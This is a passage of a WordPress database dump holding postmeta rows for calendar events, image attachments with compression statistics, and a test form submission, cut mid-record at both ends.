:0:{}'),(143102,265095,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(143101,265095,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-09\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-09\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(143100,265095,'mec_end_day_seconds','72000'),(143099,265095,'mec_end_time_ampm','PM'),(143098,265095,'mec_end_time_minutes','0'),(143097,265095,'mec_end_time_hour','8'),(143096,265095,'mec_end_date','2021-06-09'),(143095,265095,'mec_start_day_seconds','68400'),(143094,265095,'mec_start_time_ampm','PM'),(143093,265095,'mec_start_time_minutes','0'),(143092,265095,'mec_start_time_hour','7'),(143091,265095,'mec_start_date','2021-06-09'),(143090,265095,'mec_organizer_id','1'),(179344,268204,'smush-complete','1'),(179341,268204,'_wp_attached_file','2023/03/free-eck-books-lg-2-1.png'),(179342,268204,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:317;s:6:\"height\";i:260;s:4:\"file\";s:33:\"2023/03/free-eck-books-lg-2-1.png\";s:8:\"filesize\";i:61539;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"free-eck-books-lg-2-1-300x246.png\";s:5:\"width\";i:300;s:6:\"height\";i:246;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"free-eck-books-lg-2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21561;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:33:\"free-eck-books-lg-2-1-300x260.png\";s:5:\"width\";i:300;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51054;}s:8:\"tileview\";a:5:{s:4:\"file\";s:33:\"free-eck-books-lg-2-1-300x260.png\";s:5:\"width\";i:300;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51054;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143054,247332,'_wp_old_date','2021-05-14'),(177209,267955,'mec_verification_key','faf21bccaa02eb01f3762e769633f1e9'),(143044,247345,'_wp_old_date','2021-05-14'),(143040,247344,'_wp_old_date','2021-05-14'),(143038,247343,'_wp_old_date','2021-05-14'),(143036,261921,'_wp_old_date','2021-05-14'),(143034,247342,'_wp_old_date','2021-05-14'),(143028,264901,'_wp_old_date','2021-05-14'),(143026,264902,'_wp_old_date','2021-05-14'),(143022,265030,'_wp_old_date','2021-05-14'),(143020,247336,'_wp_old_date','2021-05-14'),(143018,247330,'_wp_old_date','2021-05-14'),(143017,265091,'passster_protection_type','password'),(143016,265091,'passster_activate_protection',NULL),(143015,265091,'passster_activate_global_protection',NULL),(143014,265091,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(143013,265091,'_thumbnail_id','262990'),(143012,265091,'mec_display_cancellation_reason_in_single_page',''),(143011,265091,'mec_cancelled_reason',''),(143010,265091,'mec_moved_online_link',''),(143009,265091,'mec_event_status','EventScheduled'),(143008,265091,'mec_fields','a:0:{}'),(143007,265091,'mec_bfixed_fields','a:0:{}'),(143006,265091,'mec_public','1'),(143005,265091,'mec_countdown_method','global'),(143004,265091,'mec_timezone','global'),(143003,265091,'one_occurrence','0'),(143002,265091,'mec_additional_location_ids','a:0:{}'),(143001,265091,'mec_additional_organizer_ids','a:0:{}'),(143000,265091,'mec_currency','a:0:{}'),(142999,265091,'mec_cost',''),(142998,265091,'mec_more_info_target','_self'),(142997,265091,'mec_more_info_title',''),(142996,265091,'mec_more_info',''),(142995,265091,'mec_read_more',''),(142994,265091,'_edit_last','2'),(142993,265091,'_edit_lock','1621699176:2'),(142992,265091,'mec_event_date_submit','20210422154949'),(142991,265091,'mec_op','a:0:{}'),(142990,265091,'mec_reg_fields','a:0:{}'),(142989,265091,'mec_reg_fields_global_inheritance','1'),(142988,265091,'mec_ticket_variations','a:0:{}'),(142987,265091,'mec_ticket_variations_global_inheritance','1'),(142986,265091,'mec_fees','a:0:{}'),(142985,265091,'mec_fees_global_inheritance','1'),(142984,265091,'mec_tickets','a:0:{}'),(142983,265091,'mec_booking','a:0:{}'),(142982,265091,'mec_hourly_schedules','a:0:{}'),(135646,264204,'_wp_attached_file','2021/03/soul-travel-2-souls.jpg'),(135647,264204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:552;s:6:\"height\";i:311;s:4:\"file\";s:31:\"2021/03/soul-travel-2-souls.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"soul-travel-2-souls-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"soul-travel-2-souls-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"soul-travel-2-souls-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142981,265091,'mec_not_in_days',''),(142980,265091,'mec_in_days',''),(142979,265091,'mec_advanced_days','a:0:{}'),(142978,265091,'mec_repeat_end_at_date',''),(142977,265091,'mec_repeat_end_at_occurrences',''),(142976,265091,'mec_repeat_end',''),(142975,265091,'mec_repeat_interval','1'),(142974,265091,'mec_repeat_type',''),(142973,265091,'mec_repeat_status','0'),(142972,265091,'mec_comment',''),(142971,265091,'mec_hide_end_time','0'),(135661,264204,'original-file','2021/03/soul-travel-2-souls-updraft-pre-smush-original.jpg'),(135662,264204,'smush-complete','1'),(135663,264204,'smush-info','The file was compressed from 37.75 KB to 36.91 KB saving 2.24 percent using WP-Optimize'),(135664,264204,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:38655;s:12:\"smushed-size\";i:37791;s:15:\"savings-percent\";d:2.2400000000000002131628207280300557613372802734375;}'),(135665,264127,'original-file','2021/03/universe-rose-updraft-pre-smush-original.jpg'),(135666,264127,'smush-complete','1'),(135667,264127,'smush-info','The file was compressed from 38.31 KB to 36.83 KB saving 3.87 percent using WP-Optimize'),(135668,264127,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39231;s:12:\"smushed-size\";i:37711;s:15:\"savings-percent\";d:3.87000000000000010658141036401502788066864013671875;}'),(135723,264209,'_RTECwhoCanRegister','any'),(135693,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135695,264209,'_EventOrigin','events-calendar'),(135696,264209,'_EventOrigin','events-calendar'),(135697,264209,'_EventOrigin','events-calendar'),(135698,264209,'_EventOrigin','events-calendar'),(135699,264209,'_EventOrigin','events-calendar'),(135700,264209,'_EventOrigin','events-calendar'),(135701,264209,'_EventOrigin','events-calendar'),(135702,264209,'_EventOrigin','events-calendar'),(135703,264209,'_EventOrigin','events-calendar'),(135704,264209,'_EventOrigin','events-calendar'),(135705,264209,'_thumbnail_id','264210'),(135694,264209,'_EventOrigin','events-calendar'),(135724,264209,'_RTEClimitRegistrations','0'),(135725,264209,'_RTECmaxRegistrations','30'),(135726,264209,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(135727,264209,'_RTECnumRegistered','0'),(135728,264209,'_EventVenueID','262435'),(135730,264209,'_dp_original','263641'),(135731,264209,'_edit_lock','1616352937:2'),(135732,264209,'_edit_last','2'),(135733,264210,'_wp_attached_file','2021/03/orange-tulips.jpg'),(135734,264210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:552;s:6:\"height\";i:311;s:4:\"file\";s:25:\"2021/03/orange-tulips.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"orange-tulips-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"orange-tulips-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"orange-tulips-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142970,265091,'mec_hide_time','0'),(142969,265091,'mec_allday','0'),(142968,265091,'mec_certain_weekdays','a:0:{}'),(142967,265091,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(142966,265091,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-02\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-02\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(142965,265091,'mec_end_day_seconds','72000'),(142964,265091,'mec_end_time_ampm','PM'),(142963,265091,'mec_end_time_minutes','0'),(142962,265091,'mec_end_time_hour','8'),(142961,265091,'mec_end_date','2021-06-02'),(142960,265091,'mec_start_day_seconds','68400'),(142959,265091,'mec_start_time_ampm','PM'),(142958,265091,'mec_start_time_minutes','0'),(142957,265091,'mec_start_time_hour','7'),(142956,265091,'mec_start_date','2021-06-02'),(142955,265091,'mec_organizer_id','1'),(142954,265091,'mec_dont_show_map','1'),(142953,265091,'mec_location_id','119'),(142952,265091,'mec_color',''),(142951,265091,'protect_children',''),(142950,265091,'protect_children',''),(142949,265089,'_seq_num','1'),(142948,265089,'_form_id','49'),(142947,265089,'_field_454','ateaeatseta\naadsgagdfhad\ntaga\nta\netaahd'),(142946,265089,'_field_453','test'),(142945,265089,'_field_452','choll.03@comcast.net'),(142944,265089,'_field_458','555-555-5555'),(142943,265089,'_field_451','Testing'),(142942,265089,'_field_450','Test'),(142941,265089,'protect_children',''),(142939,265084,'smush-complete','1'),(142940,265084,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:285762;s:12:\"smushed-size\";i:269192;s:15:\"savings-percent\";d:5.79999999999999982236431605997495353221893310546875;}'),(142938,265084,'smush-info','The file was compressed from 279.06 KB to 262.88 KB saving 5.8 percent using WP-Optimize'),(135800,264210,'original-file','2021/03/orange-tulips-updraft-pre-smush-original.jpg'),(135801,264210,'smush-complete','1'),(135802,264210,'smush-info','The file was compressed from 52.53 KB to 49.74 KB saving 5.32 percent using WP-Optimize'),(135803,264210,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:53790;s:12:\"smushed-size\";i:50929;s:15:\"savings-percent\";d:5.32000000000000028421709430404007434844970703125;}'),(142937,265084,'original-file','2021/05/loveland-location-page-sized-1-updraft-pre-smush-original.jpg'),(142936,265085,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:288230;s:12:\"smushed-size\";i:271377;s:15:\"savings-percent\";d:5.8499999999999996447286321199499070644378662109375;}'),(142935,265085,'smush-info','The file was compressed from 281.47 KB to 265.02 KB saving 5.85 percent using WP-Optimize'),(142934,265085,'smush-complete','1'),(142933,265085,'original-file','2021/05/loveland-location-page-sized-2-updraft-pre-smush-original.jpg'),(135843,264220,'protect_children',''),(135844,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135845,264220,'_EventOrigin','events-calendar'),(135846,264220,'protect_children',''),(135847,264220,'protect_children',''),(135848,264220,'protect_children',''),(135849,264220,'protect_children',''),(135850,264220,'protect_children',''),(135851,264220,'protect_children',''),(135852,264220,'protect_children',''),(135853,264220,'protect_children',''),(135854,264220,'protect_children',''),(135855,264220,'protect_children',''),(135856,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135891,264220,'_EventCost',''),(135857,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135890,264220,'_EventCurrencyPosition','prefix'),(135858,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135889,264220,'_EventCurrencySymbol',''),(135892,264220,'_EventURL',''),(135859,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135888,264220,'_EventDuration','3600'),(135860,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135887,264220,'_EventEndDateUTC','2021-04-20 02:00:00'),(135861,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\"_edit_last\";i:1616331396;s:12:\"post_content\";i:1616331396;s:11:\"post_status\";i:1616331396;}'),(135886,264220,'_EventStartDateUTC','2021-04-20 01:00:00'),(135893,264220,'_EventTimezone','America/Denver'),(135862,264220,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1616331328;s:12:\"_EventOrigin\";i:1616331328;s:13:\"_thumbnail_id\";i:1616331328;s:24:\"boldgrid_hide_page_title\";i:1616331328;s:17:\"_EventShowMapLink\";i:1616331328;s:13:\"_EventShowMap\";i:1616331328;s:15:\"_EventStartDate\";i:1616331396;s:13:\"_EventEndDate\";i:1616331396;s:18:\"_EventStartDateUTC\";i:1616331396;s:16:\"_EventEndDateUTC\";i:1616331396;s:14:\"_EventDuration\";i:1616331328;s:20:\"_EventCurrencySymbol\";i:1616331328;s:22:\"_EventCurrencyPosition\";i:1616331328;s:10:\"_EventCost\";i:1616331328;s:9:\"_EventURL\";i:1616331328;s:14:\"_EventTimezone\";i:1616331328;s:18:\"_EventTimezoneAbbr\";i:1616331328;s:27:\"_EventNextPendingRecurrence\";i:1616331328;s:26:\"_RTECregistrationsDisabled\";i:1616331328;s:17:\"_RTECdeadlineType\";i:1616331328;s:19:\"_RTECwhoCanRegister\";i:1616331328;s:23:\"_RTEClimitRegistrations\";i:1616331328;s:21:\"_RTECmaxRegistrations\";i:1616331328;s:16:\"_EventRecurrence\";i:1616331328;s:18:\"_RTECnumRegistered\";i:1616331328;s:13:\"_EventVenueID\";i:1616331328;s:12:\"_dp_original\";i:1616331328;s:16:\"tribe_events_cat\";i:1616352996;s:10:\